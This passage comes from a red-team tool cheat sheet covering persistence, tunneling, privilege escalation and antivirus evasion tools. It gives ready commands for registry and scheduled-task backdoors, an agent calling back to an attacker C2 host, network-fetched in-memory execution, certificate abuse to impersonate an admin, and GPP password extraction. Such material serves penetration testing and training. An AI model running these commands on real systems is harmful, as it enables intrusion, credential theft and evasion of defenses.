"C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/ba7886582d174950.png) ### [🔙](#tool-list)[ligolo-ng](https://github.com/nicocha30/ligolo-ng) Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS). Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using [Gvisor](https://gvisor.dev/). When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network. **Install: (Download)** Precompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/nicocha30/ligolo-ng/releases). **Install: (Build)** *Building ligolo-ng (Go >= 1.17 is required):* ``` go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go # Build for Windows GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go ``` **Setup: (Linux)** ``` sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ``` **Setup: (Windows)** You need to download the [Wintun](https://www.wintun.net/) driver (used by [WireGuard](https://www.wireguard.com/)) and place the `wintun.dll` in the same folder as Ligolo (make sure you use the right architecture). **Setup: (Proxy server)** ``` ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates ``` **Usage:** *Start the agent on your target (victim) computer (no privileges are required!):* ``` ./agent -connect attacker_c2_server.com:11601 ``` A session should appear on the proxy server. ``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" ``` Use the session command to select the agent. ``` ligolo-ng » session ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 ``` Full usage information can be found [here](https://github.com/nicocha30/ligolo-ng#using-ligolo-ng). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/3069381cff174952.png) *Image used from https://github.com/nicocha30/ligolo-ng#demo* # Privilege Escalation [🔙](#tool-list)[Crassus](https://github.com/vu-ls/Crassus) "Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files to achieve the goal." - [Link](https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus) **Install: (Build)** Crassus was developed as a Visual Studio 2019 project. To build Crassus.exe: 1. Open Crassus.sln 2. Press Ctrl+Shift+B on your keyboard **Install: (precompiled)** If you trust running other people's code without knowing what it does, Crassus.exe is [provided in this repository](https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe). **Usage:** 1. In [Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon), select the `Enable Boot Logging` option. 2. Reboot. 3. Once you have logged in and Windows has settled, optionally also run [scheduled tasks that may be configured to run with privileges](https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c). 4. Run Process Monitor once again. 5. When prompted, save the boot log. 6. Reset the default Process Monitor filter using `Ctrl-R`. 7. Save this log file, e.g., to `boot.PML`. The reason for re-saving the log file is twofold: 1. Older versions of Process Monitor do not save boot logs as a single file. 2. Boot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of of Process Monitor itself. ![Crassus](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/7a6542042d174954.png) *Image used from https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots* ### [🔙](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)[LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) LinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints. **Install + Usage:** ``` curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/926904c926174955.png) ### [🔙](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) WinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints. **Install + Usage:** ``` $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/223f9bc22f174957.png) ### [🔙](https://github.com/diego-treitos/linux-smart-enumeration)[linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration) Linux smart enumeration is another good, less verbose, linux privesc tool for Linux. **Install + Usage:** ``` curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/a387c1dfa7174958.png) ### [🔙](https://github.com/GhostPack/Certify)[Certify](https://github.com/GhostPack/Certify) Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks. **Key features of Certify:** - Certificate creation - Certificate signing - Certificate import - Certificate trust modification **Install: (Compile)** Certify is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the Certify project [.sln](https://github.com/GhostPack/Certify), choose "Release", and build. **Install: (Running Certify Through PowerShell)** If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly: ``` [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt ``` Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string): ``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa...")) ``` The Main() method and any arguments can then be invoked as follows: ``` [Certify.Program]::Main("find /vulnerable".Split()) ``` Full compile instructions can be found [here](https://github.com/GhostPack/Certify#compile-instructions). **Usage:** ``` # See if there are any vulnerable templates Certify.exe find /vulnerable # Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin ``` Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough). ![image](https://user-images.githubusercontent.com/100603074/210088653-28899ba5-cbbd-4b03-8000-068fd401476d.png) ### [🔙](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) Get-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP). Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user. **Install:** Follow the PowerSploit [installation instructions](https://github.com/A-poc/RedTeam-Tools#powersploit) from this tool sheet. ``` powershell.exe -ep bypass Import-Module PowerSploit ``` **Usage:** ``` # Get all passwords with additional information Get-GPPPassword # Get list of all passwords Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/9671d96c6b175001.png) ### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock) PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. *Supports:* - MS10-015 : User Mode to Ring (KiTrap0D) - MS10-092 : Task Scheduler - MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow - MS13-081 : TrackPopupMenuEx Win32k NULL Page - MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference - MS15-051 : ClientCopyImage Win32k - MS15-078 : Font Driver Buffer Overflow - MS16-016 : 'mrxdav.sys' WebDAV - MS16-032 : Secondary Logon Handle - MS16-034 : Windows Kernel-Mode Drivers EoP - MS16-135 : Win32k Elevation of Privilege - CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc **Install: (PowerShell)** ``` # Git install git clone https://github.com/rasta-mouse/Sherlock # Load powershell module Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1 ``` **Usage: (PowerShell)** ``` # Run all functions Find-AllVulns # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference) Find-MS14058 ``` ![image](https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d5809c7fef.png) *Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/* ### [🔙](https://github.com/rasta-mouse/Watson)[Watson](https://github.com/rasta-mouse/Watson) Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities. Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system. **Install:** Using [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the [Watson project .sln](https://github.com/rasta-mouse/Watson), choose "Release", and build. **Usage:** ``` # Run all checks Watson.exe ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/99f66cbd41175003.png) *Image text used from https://github.com/rasta-mouse/Watson#usage* ### [🔙](https://github.com/knight0x07/ImpulsiveDLLHijack)[ImpulsiveDLLHijack](https://github.com/knight0x07/ImpulsiveDLLHijack) A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries. The discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's. **Install:** - **Procmon.exe** -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon - **Custom Confirmatory DLL's** : - These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path - Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!) - 32Bit dll name should be: maldll32.dll - 64Bit dll name should be: maldll64.dll - Install NuGet Package:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project) **Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.** - **Build and Setup Information:** - **ImpulsiveDLLHijack** - Clone the repository in Visual Studio - Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/ - Build the project! - The ImpulsiveDLLHijack.exe will be inside the bin directory. - **And for Confirmatory DLL's:** - Clone the repository in Visual Studio - Build the project with x86 and x64 - Rename x86 release as maldll32.dll and x64 release as maldll64.dll - **Setup:** Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :)) *Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites* **Usage:** ``` # Help ImpulsiveDLLHijack.exe -h # Look for vulnerabilities in an executable ImpulsiveDLLHijack.exe -path BINARY_PATH ``` Usage examples can be found [here](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/f90c647fa6175005.png) *Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples* ### [🔙](https://github.com/mandiant/ADFSDump)[ADFSDump](https://github.com/mandiant/ADFSDump) A C# tool to dump all sorts of goodies from AD FS. Created by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye. This tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof. **Requirements:** - ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this. - ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now. - ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe. **Install: (Compile)** ADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose "Release", and build. **Usage: (Flags)** ``` # The Active Directory domain to target. Defaults to the current domain. /domain: # The Domain Controller to target. Defaults to the current DC. /server: # Switch. Toggle to disable outputting the DKM key. /nokey # (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. /database ``` [Blog - Exploring the Golden SAML Attack Against ADFS](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/2eb5842eb7175006.png) *Image used from https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs* ### [🔙](https://github.com/AlessandroZ/BeRoot)[BeRoot](https://github.com/AlessandroZ/BeRoot) BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. The goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment. This project works on Windows, Linux and Mac OS. **Install: (Linux)** ``` git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/ ``` **Install: (Windows)** A pre-compiled version of BeRoot can be found [here](https://github.com/AlessandroZ/BeRoot/releases). **Usage:** ``` # Run BeRoot python beroot.py # Run BeRoot with user password (If you know the password use it, you could get more results) python beroot.py --password super_strong_password ``` Further information can be found here for: - [Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux) - [Windows](https://github.com/AlessandroZ/BeRoot/tree/master/Windows) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/9cef519fd4175009.png) *Image used from https://github.com/AlessandroZ/BeRoot* # Defense Evasion ### [🔙](#tool-list)[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) A PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts. **Install:** ``` git clone https://github.com/danielbohannon/Invoke-Obfuscation.git ``` **Usage:** ``` ./Invoke-Obfuscation ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/7eb343ae72175010.png) ### [🔙](#tool-list)[Veil](https://github.com/Veil-Framework/Veil) Veil is a tool for generating metasploit payloads that bypass common anti-virus solutions. It can be used to generate obfuscated shellcode, see the official [veil framework blog](https://www.veil-framework.com/) for more info. **Install: (Kali)** ``` apt -y install veil /usr/share/veil/config/setup.sh --force --silent ``` **Install: (Git)**
标签:AI合规, GitHub资源, meg, PB级数据处理, TGT, 代码生成, 信息安全, 反取证, 可视化界面, 安全分享, 安全工具推荐, 安全开源, 安全技术, 安全测试, 安全评估, 安全运维, 实战演练, 应用安全, 攻击性安全, 攻防演练, 数据展示, 日志审计, 渗透测试工具, 渗透测试技巧, 红队, 红队技巧, 红队操作, 网络安全, 资源集合, 逆向工具, 隐私保护